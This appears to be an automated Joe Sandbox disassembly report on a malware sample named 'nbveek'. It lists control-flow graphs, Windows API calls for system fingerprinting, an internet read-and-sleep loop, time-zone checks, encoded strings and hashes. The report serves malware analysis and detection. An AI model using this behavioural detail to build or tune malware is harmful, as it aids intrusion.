                                                                                                                                                                                      • Opcode ID: e87209f487bc493e29cac5696f21869be5b1176f3c2feda287017dec27bb448a
                                                                                                                                                                                      • Instruction ID: b2a378761a1721584cde69e36e9d205ef4d12158fdd8df399367d746a3d66438
                                                                                                                                                                                      • Opcode Fuzzy Hash: e87209f487bc493e29cac5696f21869be5b1176f3c2feda287017dec27bb448a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3312E6B1A012489BEB2CFB38CD4979D7FB6AF56314F948188E90457381D7359A848FA2
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1671 1174400-1174482 call 1188380 GetVersionExW 1674 1174b60-1174b7d call 1186cc2 1671->1674 1675 1174488-11744b0 call 1185760 call 1172be0 1671->1675 1682 11744b4-11744d6 call 1185760 call 1172be0 1675->1682 1683 11744b2 1675->1683 1688 11744da-11744f3 GetModuleHandleA GetProcAddress 1682->1688 1689 11744d8 1682->1689 1683->1682 1690 11744f5-1174504 1688->1690 1691 1174524-117454f 1688->1691 1689->1688 1692 1174506-1174514 1690->1692 1693 117451a-1174521 call 1187335 1690->1693 1694 1174551-1174560 1691->1694 1695 1174580-11745a1 1691->1695 1692->1693 1698 1174b7e-1174b97 call 118b98e 1692->1698 1693->1691 1700 1174576-117457d call 1187335 1694->1700 1701 1174562-1174570 1694->1701 1696 11745a7 GetSystemInfo 1695->1696 1697 11745a3-11745a5 GetNativeSystemInfo 1695->1697 1702 11745ad-11745b6 1696->1702 1697->1702 1700->1695 1701->1698 1701->1700 1706 11745d4-11745d7 1702->1706 1707 11745b8-11745bf 1702->1707 1712 1174b01-1174b04 1706->1712 1713 11745dd-11745e6 1706->1713 1710 11745c5-11745cf 1707->1710 1711 1174b5b 1707->1711 1714 1174b56 1710->1714 1711->1674 1712->1711 1717 1174b06-1174b0f 1712->1717 1715 11745f9-11745fc 1713->1715 1716 11745e8-11745f4 1713->1716 1714->1711 1718 1174602-1174609 1715->1718 1719 1174ade-1174ae0 1715->1719 1716->1714 1720 1174b36-1174b39 1717->1720 1721 1174b11-1174b15 1717->1721 1724 117460f-117466b call 1185760 call 1172be0 call 1185760 call 1172be0 call 1172d10 1718->1724 1725 11746e9-117476d call 1185760 call 1172be0 call 1185760 call 1172be0 call 1185760 call 1172be0 call 1172d10 1718->1725 1722 1174ae2-1174aec 1719->1722 1723 1174aee-1174af1 1719->1723 1728 1174b47-1174b53 1720->1728 1729 1174b3b-1174b45 1720->1729 1726 1174b17-1174b1c 1721->1726 1727 1174b2a-1174b34 1721->1727 1722->1714 1723->1711 1731 1174af3-1174aff 1723->1731 1750 1174670-1174677 1724->1750 1764 1174771-1174777 1725->1764 1765 117476f 1725->1765 1726->1727 1733 1174b1e-1174b28 1726->1733 1727->1711 1728->1714 1729->1711 1731->1714 1733->1711 1752 117467b-117469b call 118b7af 1750->1752 1753 1174679 1750->1753 1759 11746d2-11746d4 1752->1759 1760 117469d-11746ac 1752->1760 1753->1752 1762 1174acd-1174ad6 1759->1762 1763 11746da-11746e4 1759->1763 1766 11746c2-11746cf call 1187335 1760->1766 1767 11746ae-11746bc 1760->1767 1762->1712 1770 1174ad8 1762->1770 1763->1762 1768 117477b-1174797 call 1186220 1764->1768 1769 1174779 1764->1769 1765->1764 1766->1759 1767->1766 1775 1174799-11747a8 1768->1775 1776 11747c8-11747f3 1768->1776 1769->1768 1770->1719 1777 11747be-11747c5 call 1187335 1775->1777 1778 11747aa-11747b8 1775->1778 1779 11747f5-1174804 1776->1779 1780 1174824-11748b9 call 1185760 call 1172be0 call 1185760 call 1172be0 call 1185760 call 1172be0 call 1172d10 1776->1780 1777->1776 1778->1777 1783 1174806-1174814 1779->1783 1784 117481a-1174821 call 1187335 1779->1784 1801 11748bd-11748c3 1780->1801 1802 11748bb 1780->1802 1783->1784 1784->1780 1803 11748c7-11748e3 call 1186220 1801->1803 1804 11748c5 1801->1804 1802->1801 1807 11748e5-11748f4 1803->1807 1808 1174914-117493f 1803->1808 1804->1803 1809 11748f6-1174904 1807->1809 1810 117490a-1174911 call 1187335 1807->1810 1811 1174941-1174950 1808->1811 1812 1174970-1174a05 call 1185760 call 1172be0 call 1185760 call 1172be0 call 1185760 call 1172be0 call 1172d10 1808->1812 1809->1810 1810->1808 1815 1174966-117496d call 1187335 1811->1815 1816 1174952-1174960 1811->1816 1833 1174a07 1812->1833 1834 1174a09-1174a0f 1812->1834 1815->1812 1816->1815 1833->1834 1835 1174a13-1174a2f call 1186220 1834->1835 1836 1174a11 1834->1836 1839 1174a31-1174a40 1835->1839 1840 1174a60-1174a84 1835->1840 1836->1835 1841 1174a56-1174a5d call 1187335 1839->1841 1842 1174a42-1174a50 1839->1842 1843 1174a86-1174a95 1840->1843 1844 1174ab5-1174ac8 1840->1844 1841->1840 1842->1841 1846 1174a97-1174aa5 1843->1846 1847 1174aab-1174ab2 call 1187335 1843->1847 1844->1762 1846->1847 1847->1844
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetVersionExW.KERNEL32(0000011C,A875633B), ref: 0117447A
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 011744DB
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 011744E2
                                                                                                                                                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 011745A3
                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 011745A7
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InfoSystem$AddressHandleModuleNativeProcVersion
                                                                                                                                                                                      • String ID: MeuCRd==$MeuCSN==$MeuDQd==
                                                                                                                                                                                      • API String ID: 374719553-3857052341
                                                                                                                                                                                      • Opcode ID: d41706dbaaf0d0ebf868aca7f8d3eb55dff4047ab26bd30876996f3ac8b9e4df
                                                                                                                                                                                      • Instruction ID: 444327998496c449eafc02e8d4a1cf442e826f594516b1982ba831b0c3e1e047
                                                                                                                                                                                      • Opcode Fuzzy Hash: d41706dbaaf0d0ebf868aca7f8d3eb55dff4047ab26bd30876996f3ac8b9e4df
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E12E430E001149BEB2CEB28DD557ADBB72EB86314F94829CD419977C1EB359EC18F92
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1851 1180ca0-1180cda 1852 1180ce0-1180d59 call 1185760 call 1187343 call 1188380 InternetOpenA InternetOpenUrlA InternetReadFile 1851->1852 1859 1180d5f-1180d69 InternetCloseHandle * 2 call 1173750 1852->1859 1860 1180e14-1180e25 InternetCloseHandle * 2 1852->1860 1863 1180d6e-1180d7a 1859->1863 1862 1180e53-1180e62 Sleep 1860->1862 1862->1852 1864 1180e68-1180ec3 call 1185760 call 1172be0 call 1185760 * 3 1862->1864 1865 1180da8-1180daa 1863->1865 1866 1180d7c-1180d88 1863->1866 1894 1180ec7-1180ed9 call 1185760 call 117c950 1864->1894 1865->1862 1871 1180db0-1180e0f call 1185760 call 1172be0 call 1185760 * 3 1865->1871 1868 1180d8a-1180d98 1866->1868 1869 1180d9e-1180da5 call 1187335 1866->1869 1868->1869 1872 1180ffb-1181000 call 118b98e 1868->1872 1869->1865 1871->1894 1899 1180ede-1180ee7 1894->1899 1900 1180ee9-1180ef5 1899->1900 1901 1180f15-1180f2d 1899->1901 1902 1180f0b-1180f12 call 1187335 1900->1902 1903 1180ef7-1180f05 1900->1903 1904 1180f5b-1180f73 1901->1904 1905 1180f2f-1180f3b 1901->1905 1902->1901 1903->1872 1903->1902 1906 1180f9d-1180fb5 1904->1906 1907 1180f75-1180f81 1904->1907 1909 1180f3d-1180f4b 1905->1909 1910 1180f51-1180f58 call 1187335 1905->1910 1913 1180fdf-1180ffa call 1186cc2 1906->1913 1914 1180fb7-1180fc3 1906->1914 1911 1180f93-1180f9a call 1187335 1907->1911 1912 1180f83-1180f91 1907->1912 1909->1872 1909->1910 1910->1904 1911->1906 1912->1872 1912->1911 1918 1180fd5-1180fdc call 1187335 1914->1918 1919 1180fc5-1180fd3 1914->1919 1918->1913 1919->1872 1919->1918
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • InternetOpenA.WININET(011A337B,00000000,00000000,00000000,00000000), ref: 01180D1F
                                                                                                                                                                                      • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 01180D3C
                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,03E80000,03E80000), ref: 01180D50
                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 01180E14
                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 01180E19
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                                                                                                      • String ID: 853321935212$ZOu=
                                                                                                                                                                                      • API String ID: 3121278467-2861891003
                                                                                                                                                                                      • Opcode ID: e57ef5156aedaecf18a7adf146abf9498d06cf27ccb1182a23a67d1f14c4902c
                                                                                                                                                                                      • Instruction ID: e0f2173f9f4d3fc9e6f82aa2bbb1a6f2d1d889ba994b1848651109f362643b2d
                                                                                                                                                                                      • Opcode Fuzzy Hash: e57ef5156aedaecf18a7adf146abf9498d06cf27ccb1182a23a67d1f14c4902c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7751E370A0020DEBEB18FFA8CD49B9E7FB5EB05708F608158F910672C0D7755A448BE2
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1926 1193928-1193950 call 1193544 call 11935a2 1931 1193af6-1193b2b call 118b9ab call 1193544 call 11935a2 1926->1931 1932 1193956-1193962 call 119354a 1926->1932 1957 1193b31-1193b3d call 119354a 1931->1957 1958 1193c53-1193caf call 118b9ab call 119591b 1931->1958 1932->1931 1937 1193968-1193973 1932->1937 1939 11939a9-11939b2 call 118d301 1937->1939 1940 1193975-1193977 1937->1940 1953 11939b5-11939ba 1939->1953 1942 1193979-119397d 1940->1942 1945 1193999-119399b 1942->1945 1946 119397f-1193981 1942->1946 1951 119399e-11939a0 1945->1951 1949 1193983-1193989 1946->1949 1950 1193995-1193997 1946->1950 1949->1945 1954 119398b-1193993 1949->1954 1950->1951 1955 1193af2-1193af5 1951->1955 1956 11939a6 1951->1956 1953->1953 1959 11939bc-11939dd call 118d7ea call 118d301 1953->1959 1954->1942 1954->1950 1956->1939 1957->1958 1968 1193b43-1193b4f call 1193576 1957->1968 1976 1193cb9-1193cbc 1958->1976 1977 1193cb1-1193cb7 1958->1977 1959->1955 1973 11939e3-11939e6 1959->1973 1968->1958 1975 1193b55-1193b76 call 118d301 GetTimeZoneInformation 1968->1975 1978 11939e9-11939ee 1973->1978 1988 1193b7c-1193b9d 1975->1988 1989 1193c31-1193c52 call 119353e call 1193532 call 1193538 1975->1989 1980 1193cff-1193d11 1976->1980 1982 1193cbe-1193cce call 118d7ea 1976->1982 1977->1980 1978->1978 1981 11939f0-1193a02 call 118ca9c 1978->1981 1984 1193d21 1980->1984 1985 1193d13-1193d16 1980->1985 1981->1931 2001 1193a08-1193a1b call 1194547 1981->2001 1995 1193cd8-1193cf1 call 119591b 1982->1995 1996 1193cd0 1982->1996 1990 1193d26-1193d3b call 118d301 call 1186cc2 1984->1990 1991 1193d21 call 1193b03 1984->1991 1985->1984 1992 1193d18-1193d1f call 1193928 1985->1992 1997 1193b9f-1193ba4 1988->1997 1998 1193ba7-1193bae 1988->1998 1991->1990 1992->1990 2019 1193cf3-1193cf4 1995->2019 2020 1193cf6-1193cfc call 118d301 1995->2020 2003 1193cd1-1193cd6 call 118d301 1996->2003 1997->1998 2005 1193bc0-1193bc2 1998->2005 2006 1193bb0-1193bb7 1998->2006 2001->1931 2023 1193a21-1193a24 2001->2023 2025 1193cfe 2003->2025 2014 1193bc4-1193bed call 1190f2b call 1190623 2005->2014 2006->2005 2013 1193bb9-1193bbe 2006->2013 2013->2014 2039 1193bfb-1193bfd 2014->2039 2040 1193bef-1193bf2 2014->2040 2019->2003 2020->2025 2029 1193a2c-1193a32 2023->2029 2030 1193a26-1193a2a 2023->2030 2025->1980 2034 1193a35-1193a42 call 118b7af 2029->2034 2035 1193a34 2029->2035 2030->2023 2030->2029 2042 1193a45-1193a4a 2034->2042 2035->2034 2041 1193bff-1193c1d call 1190623 2039->2041 2040->2039 2043 1193bf4-1193bf9 2040->2043 2049 1193c2c-1193c2f 2041->2049 2050 1193c1f-1193c22 2041->2050 2045 1193a4c-1193a51 2042->2045 2046 1193a53-1193a54 2042->2046 2043->2041 2045->2046 2048 1193a56-1193a59 2045->2048 2046->2042 2051 1193a5b-1193a72 call 118b7af 2048->2051 2052 1193aa7-1193aaa 2048->2052 2049->1989 2050->2049 2053 1193c24-1193c2a 2050->2053 2061 1193a74 2051->2061 2062 1193a86-1193a88 2051->2062 2054 1193aac-1193aae 2052->2054 2055 1193ab1-1193ac5 2052->2055 2053->1989 2054->2055 2057 1193adb 2055->2057 2058 1193ac7-1193ad7 call 1194547 2055->2058 2063 1193ade-1193af0 call 119353e call 1193532 2057->2063 2058->1931 2068 1193ad9 2058->2068 2065 1193a76-1193a7b 2061->2065 2062->2052 2067 1193a8a-1193a9a call 118b7af 2062->2067 2063->1955 2065->2062 2069 1193a7d-1193a84 2065->2069 2075 1193aa1-1193aa5 2067->2075 2068->2063 2069->2062 2069->2065 2075->2052 2076 1193a9c-1193a9e 2075->2076 2076->2052 2077 1193aa0 2076->2077 2077->2075
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • W. Europe Standard Time, xrefs: 01193BDC
                                                                                                                                                                                      • W. Europe Daylight Time, xrefs: 01193C0B
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$InformationTimeZone
                                                                                                                                                                                      • String ID: W. Europe Daylight Time$W. Europe Standard Time
                                                                                                                                                                                      • API String ID: 597776487-986674615
                                                                                                                                                                                      • Opcode ID: 01dae8a1aa7b2fb049030292055943a10a6a2a9cd1bb23265d072fd09f585198
                                                                                                                                                                                      • Instruction ID: 44f16d94c4236086100dda739e8a0c82b75d0286c2e5efe6d90b3274dc867010
                                                                                                                                                                                      • Opcode Fuzzy Hash: 01dae8a1aa7b2fb049030292055943a10a6a2a9cd1bb23265d072fd09f585198
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9EC15372E10246AFEF2DAF7DD840AAA7BA9FF45314F14406AD4B1D7281E7349A41CB50
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 2233 1193b03-1193b2b call 1193544 call 11935a2 2238 1193b31-1193b3d call 119354a 2233->2238 2239 1193c53-1193caf call 118b9ab call 119591b 2233->2239 2238->2239 2245 1193b43-1193b4f call 1193576 2238->2245 2251 1193cb9-1193cbc 2239->2251 2252 1193cb1-1193cb7 2239->2252 2245->2239 2250 1193b55-1193b76 call 118d301 GetTimeZoneInformation 2245->2250 2260 1193b7c-1193b9d 2250->2260 2261 1193c31-1193c52 call 119353e call 1193532 call 1193538 2250->2261 2254 1193cff-1193d11 2251->2254 2255 1193cbe-1193cce call 118d7ea 2251->2255 2252->2254 2257 1193d21 2254->2257 2258 1193d13-1193d16 2254->2258 2266 1193cd8-1193cf1 call 119591b 2255->2266 2267 1193cd0 2255->2267 2262 1193d26-1193d3b call 118d301 call 1186cc2 2257->2262 2263 1193d21 call 1193b03 2257->2263 2258->2257 2264 1193d18-1193d1f call 1193928 2258->2264 2268 1193b9f-1193ba4 2260->2268 2269 1193ba7-1193bae 2260->2269 2263->2262 2264->2262 2287 1193cf3-1193cf4 2266->2287 2288 1193cf6-1193cfc call 118d301 2266->2288 2273 1193cd1-1193cd6 call 118d301 2267->2273 2268->2269 2275 1193bc0-1193bc2 2269->2275 2276 1193bb0-1193bb7 2269->2276 2292 1193cfe 2273->2292 2283 1193bc4-1193bed call 1190f2b call 1190623 2275->2283 2276->2275 2282 1193bb9-1193bbe 2276->2282 2282->2283 2300 1193bfb-1193bfd 2283->2300 2301 1193bef-1193bf2 2283->2301 2287->2273 2288->2292 2292->2254 2302 1193bff-1193c1d call 1190623 2300->2302 2301->2300 2303 1193bf4-1193bf9 2301->2303 2306 1193c2c-1193c2f 2302->2306 2307 1193c1f-1193c22 2302->2307 2303->2302 2306->2261 2307->2306 2308 1193c24-1193c2a 2307->2308 2308->2261
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,011A2620), ref: 01193B6D
                                                                                                                                                                                      • _free.LIBCMT ref: 01193B5B
                                                                                                                                                                                        • Part of subcall function 0118D301: HeapFree.KERNEL32(00000000,00000000,?,011910E1,?,00000000,?,?,?,01191108,?,00000007,?,?,0119150A,?), ref: 0118D317
                                                                                                                                                                                        • Part of subcall function 0118D301: GetLastError.KERNEL32(?,?,011910E1,?,00000000,?,?,?,01191108,?,00000007,?,?,0119150A,?,?), ref: 0118D329
                                                                                                                                                                                      • _free.LIBCMT ref: 01193D27
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • W. Europe Standard Time, xrefs: 01193BDC
                                                                                                                                                                                      • W. Europe Daylight Time, xrefs: 01193C0B
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                      • String ID: W. Europe Daylight Time$W. Europe Standard Time
                                                                                                                                                                                      • API String ID: 2155170405-986674615
                                                                                                                                                                                      • Opcode ID: f5de6c3936877bde374906f3b1ae4a1a94653ea5ecebc2bc1b0d13cf5b8624f4
                                                                                                                                                                                      • Instruction ID: 82b8f15919050dbed5f9b151c062a83feaf0b338498fcc58b2de2a186d1ed8e8
                                                                                                                                                                                      • Opcode Fuzzy Hash: f5de6c3936877bde374906f3b1ae4a1a94653ea5ecebc2bc1b0d13cf5b8624f4
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4551D6B1D10206ABDF2DEBB9DC819AE7BBCFF54364B50416AD571E3280E7309A41CB50
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 0117D061
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                      • String ID: Xv==
                                                                                                                                                                                      • API String ID: 3188754299-1291970588
                                                                                                                                                                                      • Opcode ID: cc174016b8e76af0493c9d567f5a56447f1343640f2d248d6c8af85048b81bbf
                                                                                                                                                                                      • Instruction ID: e0a8d87c609339e5c5df11bb6a8a4eaf750e58f277f0d4f29c303c245bfaaee1
                                                                                                                                                                                      • Opcode Fuzzy Hash: cc174016b8e76af0493c9d567f5a56447f1343640f2d248d6c8af85048b81bbf
                                                                                                                                                                                      • Instruction Fuzzy Hash: DA325B71A000488BEF1CDBB8DD9879DBF72AF86318F64C258E405973D5DB359AC18B91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 2668 1174ba0-1174c21 call 1188380 GetVersionExW 2671 1174c23-1174c28 2668->2671 2672 1174c2d-1174c55 call 1185760 call 1172be0 2668->2672 2674 1174d6f-1174d8b call 1186cc2 2671->2674 2680 1174c57 2672->2680 2681 1174c59-1174c7b call 1185760 call 1172be0 2672->2681 2680->2681 2686 1174c7f-1174c98 GetModuleHandleA GetProcAddress 2681->2686 2687 1174c7d 2681->2687 2688 1174c9a-1174ca9 2686->2688 2689 1174cc9-1174cf4 2686->2689 2687->2686 2692 1174cbf-1174cc6 call 1187335 2688->2692 2693 1174cab-1174cb9 2688->2693 2690 1174cf6-1174d05 2689->2690 2691 1174d21-1174d42 2689->2691 2694 1174d17-1174d1e call 1187335 2690->2694 2695 1174d07-1174d15 2690->2695 2696 1174d44-1174d46 GetNativeSystemInfo 2691->2696 2697 1174d48 GetSystemInfo 2691->2697 2692->2689 2693->2692 2698 1174d8c-1174d91 call 118b98e 2693->2698 2694->2691 2695->2694 2695->2698 2703 1174d4e-1174d55 2696->2703 2697->2703 2703->2674 2706 1174d57-1174d5f 2703->2706 2707 1174d61-1174d66 2706->2707 2708 1174d68-1174d6b 2706->2708 2707->2674 2708->2674 2709 1174d6d 2708->2709 2709->2674
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetVersionExW.KERNEL32(0000011C,?,A875633B,00000000), ref: 01174C19
                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01174C80
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 01174C87
                                                                                                                                                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01174D44
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressHandleInfoModuleNativeProcSystemVersion
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2167034304-0
                                                                                                                                                                                      • Opcode ID: 42d21442a1c8cd50e197c527c0f5282540543935eea322cdb52f5d5739334d2b
                                                                                                                                                                                      • Instruction ID: 2b00783eccfb9e987989781d3c00819db4c470b141f0dfad1f82fbd06c071e7b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 42d21442a1c8cd50e197c527c0f5282540543935eea322cdb52f5d5739334d2b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 29511870D042089BEB2CEF78CD457DDBB75EB55314F5482A8E818A7780EB355AC08F92
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFileType.KERNELBASE(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0118AD90), ref: 0118AE80
                                                                                                                                                                                      • GetFileInformationByHandle.KERNELBASE(?,?), ref: 0118AEDA
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0118AD90,?,000000FF,00000000,00000000), ref: 0118AF68
                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 0118AF6F
                                                                                                                                                                                      • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 0118AFAC
                                                                                                                                                                                        • Part of subcall function 0118B1D6: __dosmaperr.LIBCMT ref: 0118B20B
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1206951868-0
                                                                                                                                                                                      • Opcode ID: 60fffa755a2c1953d2e26cb53f4d81ef429a723a59b3a59f77b1aa8f82a12f30
